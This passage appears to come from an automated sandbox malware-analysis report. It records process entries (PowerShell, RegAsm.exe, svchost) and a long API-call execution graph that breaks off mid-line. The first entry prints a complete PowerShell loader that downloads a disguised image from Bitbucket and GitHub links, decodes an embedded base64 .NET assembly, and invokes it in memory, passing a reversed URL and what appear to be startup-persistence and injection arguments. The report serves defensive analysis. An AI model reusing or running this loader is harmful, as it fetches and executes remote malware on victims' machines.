                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:03:33:23
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                        Imagebase:0x720000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:03:33:23
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                        Imagebase:0x7ff7403e0000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:31.4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:41.6%
                                                          Total number of Nodes:928
                                                          Total number of Limit Nodes:44
                                                          execution_graph 2984 7ff6975a33a0 2985 7ff6975a33bb CallWindowProcA 2984->2985 2986 7ff6975a33ac 2984->2986 2987 7ff6975a33b7 2985->2987 2986->2985 2986->2987 2988 7ff6975a55e0 2989 7ff6975a5641 ReadFile 2988->2989 2990 7ff6975a560d 2988->2990 2989->2990 2991 7ff6975a57e0 2992 7ff6975a581e 2991->2992 2993 7ff6975a57fc 2991->2993 2992->2993 2994 7ff6975a583d SetFilePointer 2992->2994 2994->2993 3012 7ff6975a8417 3013 7ff6975a842f 3012->3013 3014 7ff6975a8426 _exit 3012->3014 3015 7ff6975a8444 3013->3015 3016 7ff6975a8438 _cexit 3013->3016 3014->3013 3016->3015 3017 7ff6975a81b0 __getmainargs 3018 7ff6975a8b30 _XcptFilter 2901 7ff6975a58b0 2902 7ff6975a5904 2901->2902 2903 7ff6975a58ee 2901->2903 2904 7ff6975a58fc 2902->2904 2907 7ff6975a5a29 2902->2907 2910 7ff6975a591a 2902->2910 2903->2904 2905 7ff6975a5770 CloseHandle 2903->2905 2906 7ff6975a8470 7 API calls 2904->2906 2905->2904 2908 7ff6975a5af4 2906->2908 2909 7ff6975a5a35 SetWindowTextA 2907->2909 2911 7ff6975a5a4a 2907->2911 2909->2911 2910->2904 2912 7ff6975a5982 DosDateTimeToFileTime 2910->2912 2911->2904 2926 7ff6975a51bc GetFileAttributesA 2911->2926 2912->2904 2914 7ff6975a59a3 LocalFileTimeToFileTime 2912->2914 2914->2904 2916 7ff6975a59c1 SetFileTime 2914->2916 2916->2904 2917 7ff6975a59e9 2916->2917 2919 7ff6975a5770 CloseHandle 2917->2919 2918 7ff6975a5380 29 API calls 2920 7ff6975a5ab5 2918->2920 2921 7ff6975a59f2 SetFileAttributesA 2919->2921 2920->2904 2922 7ff6975a5ac1 2920->2922 2921->2904 2933 7ff6975a527c LocalAlloc 2922->2933 2925 7ff6975a5acb 2925->2904 2927 7ff6975a525f 2926->2927 2929 7ff6975a51de 2926->2929 2927->2904 2927->2918 2928 7ff6975a5246 SetFileAttributesA 2928->2927 2929->2927 2929->2928 2930 7ff6975a7ac8 28 API calls 2929->2930 2931 7ff6975a5228 2930->2931 2931->2927 2931->2928 2932 7ff6975a523c 2931->2932 2932->2928 2934 7ff6975a52d4 LocalAlloc 2933->2934 2935 7ff6975a52aa 2933->2935 2938 7ff6975a5300 2934->2938 2939 7ff6975a52cd 2934->2939 2936 7ff6975a4dcc 24 API calls 2935->2936 2936->2939 2940 7ff6975a4dcc 24 API calls 2938->2940 2939->2925 2939->2939 2941 7ff6975a5323 LocalFree 2940->2941 2941->2939 3024 7ff6975a78b0 3025 7ff6975a78fd 3024->3025 3026 7ff6975a7ba8 CharPrevA 3025->3026 3027 7ff6975a7935 CreateFileA 3026->3027 3028 7ff6975a797e WriteFile 3027->3028 3029 7ff6975a7970 3027->3029 3030 7ff6975a79a2 CloseHandle 3028->3030 3032 7ff6975a8470 7 API calls 3029->3032 3030->3029 3033 7ff6975a79d5 3032->3033 3034 7ff6975a4a30 3035 7ff6975a4a50 3034->3035 3036 7ff6975a4a39 SendMessageA 3034->3036 3036->3035 3037 7ff6975a3530 3038 7ff6975a3802 EndDialog 3037->3038 3039 7ff6975a3557 3037->3039 3057 7ff6975a356b 3038->3057 3040 7ff6975a377e GetDesktopWindow 3039->3040 3041 7ff6975a3567 3039->3041 3042 7ff6975a4c68 14 API calls 3040->3042 3044 7ff6975a3635 GetDlgItemTextA 3041->3044 3045 7ff6975a357b 3041->3045 3041->3057 3043 7ff6975a3795 SetWindowTextA SendDlgItemMessageA 3042->3043 3046 7ff6975a37d8 GetDlgItem EnableWindow 3043->3046 3043->3057 3054 7ff6975a365e 3044->3054 3069 7ff6975a36e9 3044->3069 3047 7ff6975a3584 3045->3047 3048 7ff6975a3618 EndDialog 3045->3048 3046->3057 3049 7ff6975a3591 LoadStringA 3047->3049 3047->3057 3048->3057 3050 7ff6975a35de 3049->3050 3051 7ff6975a35bd 3049->3051 3074 7ff6975a4a60 LoadLibraryA 3050->3074 3055 7ff6975a4dcc 24 API calls 3051->3055 3053 7ff6975a4dcc 24 API calls 3053->3057 3058 7ff6975a3694 GetFileAttributesA 3054->3058 3054->3069 3073 7ff6975a35d7 3055->3073 3059 7ff6975a36a8 3058->3059 3060 7ff6975a36fa 3058->3060 3062 7ff6975a4dcc 24 API calls 3059->3062 3064 7ff6975a7ba8 CharPrevA 3060->3064 3061 7ff6975a35eb SetDlgItemTextA 3061->3051 3061->3057 3065 7ff6975a36cb 3062->3065 3063 7ff6975a374b EndDialog 3063->3057 3066 7ff6975a370e 3064->3066 3065->3057 3067 7ff6975a36d4 CreateDirectoryA 3065->3067 3068 7ff6975a6b70 31 API calls 3066->3068 3067->3060 3067->3069 3070 7ff6975a3716 3068->3070 3069->3053 3070->3069 3071 7ff6975a3721 3070->3071 3072 7ff6975a6ca4 38 API calls 3071->3072 3071->3073 3072->3073 3073->3057 3073->3063 3075 7ff6975a4c20 3074->3075 3076 7ff6975a4aa0 GetProcAddress 3074->3076 3080 7ff6975a4dcc 24 API calls 3075->3080 3077 7ff6975a4ac2 GetProcAddress 3076->3077 3078 7ff6975a4c0a FreeLibrary 3076->3078 3077->3078 3079 7ff6975a4ae2 GetProcAddress 3077->3079 3078->3075 3079->3078 3082 7ff6975a4b04 3079->3082 3081 7ff6975a35e3 3080->3081 3081->3057 3081->3061 3083 7ff6975a4b13 GetTempPathA 3082->3083 3088 7ff6975a4b65 3082->3088 3084 7ff6975a4b2b 3083->3084 3084->3084 3085 7ff6975a4b34 CharPrevA 3084->3085 3087 7ff6975a4b4e CharPrevA 3085->3087 3085->3088 3086 7ff6975a4bee FreeLibrary 3086->3081 3087->3088 3088->3086 3089 7ff6975a5870 GlobalAlloc 3090 7ff6975a33f0 3091 7ff6975a3402 3090->3091 3092 7ff6975a34ec 3090->3092 3096 7ff6975a3441 GetDesktopWindow 3091->3096 3098 7ff6975a340f 3091->3098 3093 7ff6975a34e5 3092->3093 3094 7ff6975a34f5 SendDlgItemMessageA 3092->3094 3094->3093 3095 7ff6975a3430 EndDialog 3095->3093 3097 7ff6975a4c68 14 API calls 3096->3097 3099 7ff6975a3458 6 API calls 3097->3099 3098->3093 3098->3095 3099->3093 2066 7ff6975a8200 2085 7ff6975a8964 2066->2085 2070 7ff6975a824b 2071 7ff6975a825d 2070->2071 2073 7ff6975a8277 Sleep 2070->2073 2072 7ff6975a826d _amsg_exit 2071->2072 2078 7ff6975a8284 2071->2078 2072->2078 2073->2070 2074 7ff6975a82fc _initterm 2077 7ff6975a8319 _IsNonwritableInCurrentImage 2074->2077 2075 7ff6975a82dd 2076 7ff6975a83f8 _ismbblead 2076->2077 2077->2075 2077->2076 2079 7ff6975a837d 2077->2079 2078->2074 2078->2075 2078->2077 2089 7ff6975a2c54 GetVersion 2079->2089 2082 7ff6975a83cf 2082->2075 2084 7ff6975a83d8 _cexit 2082->2084 2083 7ff6975a83c7 exit 2083->2082 2084->2075 2086 7ff6975a8990 6 API calls 2085->2086 2087 7ff6975a8209 GetStartupInfoW 2085->2087 2088 7ff6975a8a0f 2086->2088 2087->2070 2088->2087 2090 7ff6975a2cc3 2089->2090 2091 7ff6975a2c7b 2089->2091 2113 7ff6975a2db4 2090->2113 2091->2090 2092 7ff6975a2c7f GetModuleHandleW 2091->2092 2092->2090 2094 7ff6975a2c97 GetProcAddress 2092->2094 2094->2090 2095 7ff6975a2cb2 2094->2095 2095->2090 2096 7ff6975a2d7f 2099 7ff6975a2d97 2096->2099 2100 7ff6975a2d8b CloseHandle 2096->2100 2099->2082 2099->2083 2100->2099 2104 7ff6975a2d29 2104->2096 2105 7ff6975a2d5e 2104->2105 2106 7ff6975a2d33 2104->2106 2109 7ff6975a2d67 ExitWindowsEx 2105->2109 2110 7ff6975a2d7a 2105->2110 2230 7ff6975a4dcc 2106->2230 2109->2096 2259 7ff6975a1c0c GetCurrentProcess OpenProcessToken 2110->2259 2114 7ff6975a8b09 2113->2114 2115 7ff6975a2df9 memset memset 2114->2115 2267 7ff6975a5050 FindResourceA SizeofResource 2115->2267 2118 7ff6975a2e53 CreateEventA SetEvent 2119 7ff6975a5050 7 API calls 2118->2119 2122 7ff6975a2e92 2119->2122 2120 7ff6975a4dcc 24 API calls 2149 7ff6975a2fd9 2120->2149 2121 7ff6975a2ed5 2126 7ff6975a5050 7 API calls 2121->2126 2122->2121 2125 7ff6975a2fa3 2122->2125 2131 7ff6975a2e96 2122->2131 2123 7ff6975a4dcc 24 API calls 2158 7ff6975a2eb4 2123->2158 2272 7ff6975a70a8 2125->2272 2127 7ff6975a2eec 2126->2127 2130 7ff6975a2efe CreateMutexA 2127->2130 2127->2131 2130->2125 2133 7ff6975a2f22 GetLastError 2130->2133 2131->2123 2133->2125 2138 7ff6975a2f35 2133->2138 2134 7ff6975a2fb5 2134->2120 2135 7ff6975a2fc4 2136 7ff6975a2fde FindResourceExA 2135->2136 2137 7ff6975a2fcd 2135->2137 2140 7ff6975a2fff LoadResource 2136->2140 2141 7ff6975a3014 2136->2141 2307 7ff6975a204c 2137->2307 2142 7ff6975a2f62 2138->2142 2143 7ff6975a2f4a 2138->2143 2140->2141 2145 7ff6975a3029 2141->2145 2146 7ff6975a301d #17 2141->2146 2147 7ff6975a4dcc 24 API calls 2142->2147 2144 7ff6975a4dcc 24 API calls 2143->2144 2148 7ff6975a2f60 2144->2148 2145->2149 2150 7ff6975a303a 2145->2150 2146->2145 2151 7ff6975a2f7c 2147->2151 2152 7ff6975a2f81 CloseHandle 2148->2152 2299 7ff6975a8470 2149->2299 2322 7ff6975a3bf4 GetVersionExA 2150->2322 2151->2125 2151->2152 2152->2149 2158->2149 2159 7ff6975a30ec 2160 7ff6975a3141 2159->2160 2161 7ff6975a3116 2159->2161 2456 7ff6975a5fe4 2160->2456 2163 7ff6975a3134 2161->2163 2436 7ff6975a60a4 2161->2436 2614 7ff6975a3f74 2163->2614 2171 7ff6975a8470 7 API calls 2173 7ff6975a2ce1 2171->2173 2172 7ff6975a315b GetSystemDirectoryA 2174 7ff6975a7ba8 CharPrevA 2172->2174 2205 7ff6975a61ec 2173->2205 2175 7ff6975a3186 LoadLibraryA 2174->2175 2176 7ff6975a319f GetProcAddress 2175->2176 2177 7ff6975a31c9 FreeLibrary 2175->2177 2176->2177 2178 7ff6975a31ba DecryptFileA 2176->2178 2179 7ff6975a3273 SetCurrentDirectoryA 2177->2179 2180 7ff6975a31e4 2177->2180 2178->2177 2181 7ff6975a320d 2179->2181 2189 7ff6975a3291 2179->2189 2180->2179 2182 7ff6975a31f0 GetWindowsDirectoryA 2180->2182 2186 7ff6975a4dcc 24 API calls 2181->2186 2182->2181 2184 7ff6975a325a 2182->2184 2183 7ff6975a331f 2190 7ff6975a2318 18 API calls 2183->2190 2197 7ff6975a3347 2183->2197 2203 7ff6975a3236 2183->2203 2519 7ff6975a6ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2184->2519 2187 7ff6975a322b 2186->2187 2633 7ff6975a7700 GetLastError 2187->2633 2189->2183 2191 7ff6975a32fb 2189->2191 2194 7ff6975a32cb 2189->2194 2190->2197 2546 7ff6975a5d90 2191->2546 2193 7ff6975a3368 2201 7ff6975a3383 2193->2201 2193->2203 2198 7ff6975a7ac8 28 API calls 2194->2198 2195 7ff6975a3230 2195->2203 2197->2193 2568 7ff6975a40c4 2197->2568 2199 7ff6975a32f6 2198->2199 2199->2203 2634 7ff6975a772c 2199->2634 2644 7ff6975a494c 2201->2644 2203->2171 2206 7ff6975a6214 2205->2206 2207 7ff6975a624c LocalFree LocalFree 2206->2207 2208 7ff6975a6229 SetFileAttributesA DeleteFileA 2206->2208 2215 7ff6975a6273 2206->2215 2207->2206 2208->2207 2209 7ff6975a6311 2210 7ff6975a6387 2209->2210 2212 7ff6975a632d RegOpenKeyExA 2209->2212 2211 7ff6975a8470 7 API calls 2210->2211 2213 7ff6975a2ce8 2211->2213 2212->2210 2214 7ff6975a635e RegDeleteValueA RegCloseKey 2212->2214 2213->2096 2213->2104 2219 7ff6975a2318 2213->2219 2214->2210 2215->2209 2216 7ff6975a62f4 SetCurrentDirectoryA 2215->2216 2217 7ff6975a7c40 4 API calls 2215->2217 2218 7ff6975a204c 16 API calls 2216->2218 2217->2216 2218->2209 2220 7ff6975a2330 2219->2220 2221 7ff6975a2447 2219->2221 2222 7ff6975a23cb RegOpenKeyExA 2220->2222 2223 7ff6975a233a 2220->2223 2893 7ff6975a2244 GetWindowsDirectoryA 2221->2893 2225 7ff6975a23c3 2222->2225 2226 7ff6975a23fe RegQueryInfoKeyA 2222->2226 2223->2225 2227 7ff6975a234a RegOpenKeyExA 2223->2227 2225->2104 2228 7ff6975a23a8 RegCloseKey 2226->2228 2227->2225 2229 7ff6975a237d RegQueryValueExA 2227->2229 2228->2225 2229->2228 2231 7ff6975a5024 2230->2231 2232 7ff6975a4e49 LoadStringA 2230->2232 2235 7ff6975a8470 7 API calls 2231->2235 2233 7ff6975a4e73 2232->2233 2234 7ff6975a4eb5 2232->2234 2238 7ff6975a7f04 13 API calls 2233->2238 2236 7ff6975a4f31 2234->2236 2241 7ff6975a4ec1 LocalAlloc 2234->2241 2237 7ff6975a2d59 2235->2237 2243 7ff6975a4f8e LocalAlloc 2236->2243 2244 7ff6975a4f44 LocalAlloc 2236->2244 2237->2096 2237->2105 2239 7ff6975a4e78 2238->2239 2240 7ff6975a4e81 MessageBoxA 2239->2240 2242 7ff6975a7e34 2 API calls 2239->2242 2240->2231 2241->2231 2250 7ff6975a4f14 2241->2250 2242->2240 2243->2231 2246 7ff6975a4f2c 2243->2246 2244->2231 2251 7ff6975a4f79 2244->2251 2249 7ff6975a4fbc MessageBeep 2246->2249 2253 7ff6975a7f04 13 API calls 2249->2253 2254 7ff6975a114c _vsnprintf 2250->2254 2252 7ff6975a114c _vsnprintf 2251->2252 2252->2246 2255 7ff6975a4fd3 2253->2255 2254->2246 2256 7ff6975a4fdc MessageBoxA LocalFree 2255->2256 2257 7ff6975a7e34 2 API calls 2255->2257 2256->2231 2257->2256 2260 7ff6975a1c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2259->2260 2261 7ff6975a1c4c 2259->2261 2260->2261 2262 7ff6975a1cec ExitWindowsEx 2260->2262 2263 7ff6975a4dcc 24 API calls 2261->2263 2262->2261 2264 7ff6975a1c68 2262->2264 2263->2264 2265 7ff6975a8470 7 API calls 2264->2265 2266 7ff6975a1d1a 2265->2266 2266->2096 2268 7ff6975a509b 2267->2268 2269 7ff6975a2e43 2267->2269 2268->2269 2270 7ff6975a50a4 FindResourceA LoadResource LockResource 2268->2270 2269->2118 2269->2134 2270->2269 2271 7ff6975a50e3 memcpy_s FreeResource 2270->2271 2271->2269 2273 7ff6975a7566 2272->2273 2282 7ff6975a70f2 2272->2282 2274 7ff6975a8470 7 API calls 2273->2274 2276 7ff6975a2fb1 2274->2276 2275 7ff6975a71ca 2275->2273 2278 7ff6975a71e7 GetModuleFileNameA 2275->2278 2276->2134 2276->2135 2277 7ff6975a711d CharNextA 2277->2282 2279 7ff6975a720f 2278->2279 2280 7ff6975a721c 2278->2280 2364 7ff6975a7d68 2279->2364 2280->2273 2282->2273 2282->2275 2282->2277 2283 7ff6975a76f1 2282->2283 2286 7ff6975a7238 CharUpperA 2282->2286 2292 7ff6975a739d CharUpperA 2282->2292 2293 7ff6975a7346 CompareStringA 2282->2293 2294 7ff6975a73fb CharUpperA 2282->2294 2295 7ff6975a72d0 CharUpperA 2282->2295 2296 7ff6975a7492 CharUpperA 2282->2296 2297 7ff6975a7ce8 IsDBCSLeadByte CharNextA 2282->2297 2369 7ff6975a7ba8 2282->2369 2373 7ff6975a8648 RtlCaptureContext RtlLookupFunctionEntry 2283->2373 2286->2282 2287 7ff6975a766f 2286->2287 2288 7ff6975a4dcc 24 API calls 2287->2288 2289 7ff6975a7692 2288->2289 2290 7ff6975a769e CloseHandle 2289->2290 2291 7ff6975a76aa ExitProcess 2289->2291 2290->2291 2292->2282 2293->2282 2294->2282 2295->2282 2296->2282 2297->2282 2300 7ff6975a8479 2299->2300 2301 7ff6975a2cd4 2300->2301 2302 7ff6975a84d0 RtlCaptureContext RtlLookupFunctionEntry 2300->2302 2301->2096 2301->2159 2303 7ff6975a8515 RtlVirtualUnwind 2302->2303 2304 7ff6975a8557 2302->2304 2303->2304 2379 7ff6975a8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2304->2379 2308 7ff6975a2213 2307->2308 2311 7ff6975a2086 2307->2311 2309 7ff6975a8470 7 API calls 2308->2309 2310 7ff6975a2222 2309->2310 2310->2149 2312 7ff6975a20dc FindFirstFileA 2311->2312 2312->2308 2319 7ff6975a20fe 2312->2319 2313 7ff6975a21a3 2317 7ff6975a21b4 SetFileAttributesA DeleteFileA 2313->2317 2314 7ff6975a2138 lstrcmpA 2315 7ff6975a21d9 FindNextFileA 2314->2315 2316 7ff6975a2158 lstrcmpA 2314->2316 2318 7ff6975a21f5 FindClose RemoveDirectoryA 2315->2318 2315->2319 2316->2315 2316->2319 2317->2315 2318->2308 2319->2313 2319->2314 2319->2315 2320 7ff6975a7ba8 CharPrevA 2319->2320 2321 7ff6975a204c 8 API calls 2319->2321 2320->2319 2321->2319 2323 7ff6975a3c59 2322->2323 2329 7ff6975a3c4f 2322->2329 2325 7ff6975a3f05 2323->2325 2323->2329 2330 7ff6975a3db1 2323->2330 2380 7ff6975a2834 2323->2380 2324 7ff6975a4dcc 24 API calls 2324->2325 2326 7ff6975a8470 7 API calls 2325->2326 2327 7ff6975a3042 2326->2327 2327->2149 2337 7ff6975a12ec 2327->2337 2329->2324 2329->2325 2330->2325 2330->2329 2331 7ff6975a3eb7 MessageBeep 2330->2331 2393 7ff6975a7f04 2331->2393 2334 7ff6975a3ed3 MessageBoxA 2334->2325 2338 7ff6975a133c 2337->2338 2343 7ff6975a14b5 2337->2343 2427 7ff6975a11cc LoadLibraryA 2338->2427 2340 7ff6975a8470 7 API calls 2342 7ff6975a14da 2340->2342 2342->2149 2356 7ff6975a7ac8 FindResourceA 2342->2356 2343->2340 2344 7ff6975a134d GetCurrentProcess OpenProcessToken 2344->2343 2345 7ff6975a1377 GetTokenInformation 2344->2345 2346 7ff6975a14a0 CloseHandle 2345->2346 2347 7ff6975a13a0 GetLastError 2345->2347 2346->2343 2347->2346 2348 7ff6975a13b5 LocalAlloc 2347->2348 2348->2346 2349 7ff6975a13d2 GetTokenInformation 2348->2349 2350 7ff6975a1491 LocalFree 2349->2350 2351 7ff6975a13fc AllocateAndInitializeSid 2349->2351 2350->2346 2351->2350 2354 7ff6975a1445 2351->2354 2352 7ff6975a1481 FreeSid 2352->2350 2353 7ff6975a1452 EqualSid 2353->2354 2355 7ff6975a1476 2353->2355 2354->2352 2354->2353 2354->2355 2355->2352 2357 7ff6975a7b63 2356->2357 2358 7ff6975a7b03 LoadResource 2356->2358 2359 7ff6975a4dcc 24 API calls 2357->2359 2358->2357 2360 7ff6975a7b1d DialogBoxIndirectParamA FreeResource 2358->2360 2361 7ff6975a7b82 2359->2361 2360->2357 2363 7ff6975a7b87 2360->2363 2361->2363 2363->2158 2365 7ff6975a7dd9 2364->2365 2366 7ff6975a7d88 2364->2366 2365->2280 2367 7ff6975a7d90 IsDBCSLeadByte 2366->2367 2368 7ff6975a7db6 CharNextA 2366->2368 2367->2366 2368->2365 2368->2366 2370 7ff6975a7bc8 2369->2370 2370->2370 2371 7ff6975a7bec CharPrevA 2370->2371 2372 7ff6975a7bda 2370->2372 2371->2372 2372->2282 2374 7ff6975a8685 RtlVirtualUnwind 2373->2374 2375 7ff6975a86c7 2373->2375 2374->2375 2378 7ff6975a8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2375->2378 2381 7ff6975a2a2f 2380->2381 2391 7ff6975a2872 2380->2391 2383 7ff6975a2a41 GlobalFree 2381->2383 2384 7ff6975a2a50 2381->2384 2383->2384 2384->2330 2385 7ff6975a28a5 GetFileVersionInfoSizeA 2386 7ff6975a28c2 GlobalAlloc 2385->2386 2385->2391 2386->2381 2387 7ff6975a28e1 GlobalLock 2386->2387 2387->2381 2388 7ff6975a28fc GetFileVersionInfoA 2387->2388 2389 7ff6975a2920 VerQueryValueA 2388->2389 2388->2391 2390 7ff6975a29ed GlobalUnlock 2389->2390 2389->2391 2390->2391 2391->2381 2391->2385 2391->2390 2392 7ff6975a29d9 GlobalUnlock 2391->2392 2408 7ff6975a261c 2391->2408 2392->2381 2394 7ff6975a7f44 GetVersionExA 2393->2394 2395 7ff6975a8076 2393->2395 2394->2395 2396 7ff6975a7f6d 2394->2396 2397 7ff6975a8470 7 API calls 2395->2397 2396->2395 2399 7ff6975a7f90 GetSystemMetrics 2396->2399 2398 7ff6975a3eca 2397->2398 2398->2334 2404 7ff6975a7e34 2398->2404 2399->2395 2400 7ff6975a7fa7 RegOpenKeyExA 2399->2400 2400->2395 2401 7ff6975a7fdc RegQueryValueExA RegCloseKey 2400->2401 2401->2395 2403 7ff6975a8026 2401->2403 2402 7ff6975a8065 CharNextA 2402->2403 2403->2395 2403->2402 2405 7ff6975a7e5a EnumResourceLanguagesA 2404->2405 2407 7ff6975a7edd 2404->2407 2406 7ff6975a7e9f EnumResourceLanguagesA 2405->2406 2405->2407 2406->2407 2407->2334 2409 7ff6975a27e0 GetSystemDirectoryA 2408->2409 2410 7ff6975a265b CharUpperA CharNextA CharNextA 2408->2410 2411 7ff6975a27f1 2409->2411 2412 7ff6975a27dd 2410->2412 2413 7ff6975a269c 2410->2413 2414 7ff6975a2805 2411->2414 2417 7ff6975a7ba8 CharPrevA 2411->2417 2412->2409 2415 7ff6975a27c7 GetWindowsDirectoryA 2413->2415 2416 7ff6975a26a6 2413->2416 2418 7ff6975a8470 7 API calls 2414->2418 2415->2411 2420 7ff6975a7ba8 CharPrevA 2416->2420 2417->2414 2419 7ff6975a2814 2418->2419 2419->2391 2421 7ff6975a2705 RegOpenKeyExA 2420->2421 2421->2411 2422 7ff6975a2738 RegQueryValueExA 2421->2422 2423 7ff6975a27b4 RegCloseKey 2422->2423 2424 7ff6975a276b 2422->2424 2423->2411 2425 7ff6975a2774 ExpandEnvironmentStringsA 2424->2425 2426 7ff6975a2792 2424->2426 2425->2426 2426->2423 2428 7ff6975a1221 GetProcAddress 2427->2428 2429 7ff6975a12bb 2427->2429 2430 7ff6975a123f AllocateAndInitializeSid 2428->2430 2431 7ff6975a12ac FreeLibrary 2428->2431 2432 7ff6975a8470 7 API calls 2429->2432 2430->2431 2433 7ff6975a1288 FreeSid 2430->2433 2431->2429 2434 7ff6975a12ca 2432->2434 2433->2431 2434->2343 2434->2344 2437 7ff6975a5050 7 API calls 2436->2437 2438 7ff6975a60bf LocalAlloc 2437->2438 2439 7ff6975a610b 2438->2439 2440 7ff6975a60dd 2438->2440 2442 7ff6975a5050 7 API calls 2439->2442 2441 7ff6975a4dcc 24 API calls 2440->2441 2443 7ff6975a60fb 2441->2443 2444 7ff6975a611d 2442->2444 2657 7ff6975a7700 GetLastError 2443->2657 2446 7ff6975a6121 2444->2446 2447 7ff6975a615a lstrcmpA 2444->2447 2448 7ff6975a4dcc 24 API calls 2446->2448 2449 7ff6975a6174 LocalFree 2447->2449 2450 7ff6975a618a 2447->2450 2451 7ff6975a613f LocalFree 2448->2451 2452 7ff6975a3123 2449->2452 2453 7ff6975a4dcc 24 API calls 2450->2453 2451->2452 2452->2160 2452->2163 2452->2203 2454 7ff6975a61ac LocalFree 2453->2454 2455 7ff6975a6100 2454->2455 2455->2452 2457 7ff6975a5050 7 API calls 2456->2457 2458 7ff6975a6001 2457->2458 2459 7ff6975a6006 2458->2459 2460 7ff6975a604a 2458->2460 2461 7ff6975a4dcc 24 API calls 2459->2461 2462 7ff6975a5050 7 API calls 2460->2462 2463 7ff6975a6025 2461->2463 2464 7ff6975a6063 2462->2464 2465 7ff6975a3146 2463->2465 2466 7ff6975a772c 13 API calls 2464->2466 2465->2203 2470 7ff6975a66c4 2465->2470 2467 7ff6975a606f 2466->2467 2467->2465 2468 7ff6975a6073 2467->2468 2469 7ff6975a4dcc 24 API calls 2468->2469 2469->2463 2471 7ff6975a5050 7 API calls 2470->2471 2472 7ff6975a6706 LocalAlloc 2471->2472 2473 7ff6975a6756 2472->2473 2474 7ff6975a6726 2472->2474 2476 7ff6975a5050 7 API calls 2473->2476 2475 7ff6975a4dcc 24 API calls 2474->2475 2477 7ff6975a6744 2475->2477 2478 7ff6975a6768 2476->2478 2682 7ff6975a7700 GetLastError 2477->2682 2480 7ff6975a67a5 lstrcmpA LocalFree 2478->2480 2481 7ff6975a676c 2478->2481 2484 7ff6975a6837 2480->2484 2485 7ff6975a67ec 2480->2485 2483 7ff6975a4dcc 24 API calls 2481->2483 2482 7ff6975a6749 2486 7ff6975a674f 2482->2486 2488 7ff6975a678a LocalFree 2483->2488 2487 7ff6975a6b14 2484->2487 2490 7ff6975a684f GetTempPathA 2484->2490 2491 7ff6975a64e4 53 API calls 2485->2491 2492 7ff6975a8470 7 API calls 2486->2492 2489 7ff6975a7ac8 28 API calls 2487->2489 2488->2486 2489->2486 2493 7ff6975a6872 2490->2493 2500 7ff6975a68a5 2490->2500 2494 7ff6975a680c 2491->2494 2495 7ff6975a3153 2492->2495 2658 7ff6975a64e4 2493->2658 2494->2486 2497 7ff6975a6814 2494->2497 2495->2172 2495->2203 2499 7ff6975a4dcc 24 API calls 2497->2499 2499->2482 2500->2486 2501 7ff6975a68f9 GetDriveTypeA 2500->2501 2502 7ff6975a6adb GetWindowsDirectoryA 2500->2502 2505 7ff6975a6916 GetFileAttributesA 2501->2505 2516 7ff6975a6911 2501->2516 2504 7ff6975a6ca4 38 API calls 2502->2504 2504->2500 2505->2516 2507 7ff6975a64e4 53 API calls 2507->2500 2508 7ff6975a6ca4 38 API calls 2508->2516 2509 7ff6975a6955 GetDiskFreeSpaceA 2510 7ff6975a6983 MulDiv 2509->2510 2509->2516 2510->2516 2511 7ff6975a2468 25 API calls 2511->2516 2512 7ff6975a6a02 GetWindowsDirectoryA 2512->2516 2513 7ff6975a7ba8 CharPrevA 2514 7ff6975a6a2a GetFileAttributesA 2513->2514 2515 7ff6975a6a40 CreateDirectoryA 2514->2515 2514->2516 2515->2516 2516->2486 2516->2501 2516->2502 2516->2505 2516->2508 2516->2509 2516->2511 2516->2512 2516->2513 2517 7ff6975a6a6d SetFileAttributesA 2516->2517 2518 7ff6975a64e4 53 API calls 2516->2518 2517->2516 2518->2516 2520 7ff6975a6d3f GetDiskFreeSpaceA 2519->2520 2521 